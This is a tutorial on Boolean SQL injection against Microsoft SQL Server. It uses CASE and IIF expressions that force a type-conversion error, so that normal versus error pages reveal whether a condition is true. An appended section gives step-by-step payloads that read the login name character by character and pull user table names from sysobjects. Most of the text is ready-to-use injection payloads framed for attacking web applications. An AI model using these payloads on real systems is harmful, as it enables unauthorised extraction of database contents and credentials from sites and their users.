
SQL Server Conditional Statement Injection Tips



Preface 

During injection you may hit a situation where the injection point is real, but the queried table returns no data for the injected id. Ordinary Boolean-based injection then fails, because it relies on rows appearing or disappearing from the page. This method gives you the same effect as the MySQL trick case when 1 like 1 then 0 else 2*1e308 end: the false branch is made to raise an error. Here the error comes from SQL Server comparing values of inconsistent data types (the string 'x' is forced into an int and the conversion fails), so a true condition produces a normal response and a false condition produces a database error. The response type, not the row count, carries the Boolean result.




CASE Conditional Statement 

example 1

SQL: select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END)

The condition is true, so the CASE returns the integer 1, the comparison 1=1 holds and the page loads normally.

SQL: select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END)

The condition is false, so the CASE has to return 'x'. Because the other branch is an int, and int has the higher data type precedence, SQL Server tries to convert 'x' to int and fails with "Conversion failed when converting the varchar value 'x' to data type int." The page returns an error instead of loading.


In this way the Boolean result is forced: normal page means true, error page means false, and neither outcome depends on the query returning any rows.

example 2

Replace the constant condition with the one you actually want to test, for example whether the current login name contains sa:

SQL: select * from article WHERE id=1 and 1=(CASE WHEN system_user like '%sa%' THEN 1 ELSE 'x' END)

If the login name contains sa the page loads normally. A pattern that cannot match confirms the false branch errors:

SQL: select * from article WHERE id=1 and 1=(CASE WHEN system_user like '%aaaaa%' THEN 1 ELSE 'x' END)

IIF Conditional Statement

IIF (available from SQL Server 2012) is shorthand for a two-branch CASE, so it behaves the same way and gives a shorter payload:

SQL: select * from article WHERE id=1 and 1=IIF(1=1,1,'x')

The true branch returns 1 and the page loads normally.

SQL: select * from article WHERE id=1 and 1=IIF(1=2,1,'x')

The false branch returns 'x', the conversion to int fails and the page errors.
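The following is an added example (not part of the original article) that takes the CASE and IIF oracles above beyond a yes/no check and reads a value character by character. It assumes the same injectable query as the article (the attacker controls everything after id=1 against a table named article); the pivot values, the sysobjects lookup and the character positions are illustrative. The only requirement is that the application's normal response and its database error response are distinguishable to you; if the application swallows SQL errors into an identical page, this oracle gives no signal.

```sql
-- Added example, not code from the original post. Each query is one request;
-- a normal response means the WHEN condition was true, a conversion error
-- ("Conversion failed when converting the varchar value 'x' to data type int.")
-- means it was false.

-- Step 1: confirm the oracle with constant conditions (true -> normal, false -> error).
SELECT * FROM article WHERE id=1 AND 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END);
SELECT * FROM article WHERE id=1 AND 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END);

-- Step 2: length of the login name. Each query answers "is LEN(SYSTEM_USER) > N?",
-- so a handful of requests pins the length down by bisection.
SELECT * FROM article WHERE id=1 AND 1=(CASE WHEN LEN(SYSTEM_USER)>8 THEN 1 ELSE 'x' END);
SELECT * FROM article WHERE id=1 AND 1=(CASE WHEN LEN(SYSTEM_USER)>4 THEN 1 ELSE 'x' END);

-- Step 3: one character at a time. Compare the ASCII code of position i against a
-- pivot and halve the range on each answer; about seven requests per character.
-- Position 1, first pivot 96 (is it a lowercase letter or higher?):
SELECT * FROM article WHERE id=1 AND 1=(CASE WHEN ASCII(SUBSTRING(SYSTEM_USER,1,1))>96 THEN 1 ELSE 'x' END);
-- Narrow the range (pivots such as 112, 104, 100, ...) until one code remains,
-- then confirm it with an exact comparison on the code, not the character.
SELECT * FROM article WHERE id=1 AND 1=(CASE WHEN ASCII(SUBSTRING(SYSTEM_USER,1,1))=115 THEN 1 ELSE 'x' END);

-- Step 4: the WHEN condition may contain any scalar subquery, so the same oracle
-- reads data the page never displays, e.g. the first user table name.
SELECT * FROM article WHERE id=1 AND 1=(CASE WHEN
    ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U' ORDER BY name),1,1))>96
    THEN 1 ELSE 'x' END);

-- Step 5: IIF (SQL Server 2012+) is the same CASE with less typing; the oracle is unchanged.
SELECT * FROM article WHERE id=1 AND 1=IIF(ASCII(SUBSTRING(SYSTEM_USER,1,1))>96,1,'x');
```

Compare ASCII codes rather than characters when confirming a position: a string comparison such as SUBSTRING(...)='s' follows the database collation, which is case-insensitive on most SQL Server installations, so 's' and 'S' would both read as true. The numeric comparison has no such ambiguity.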

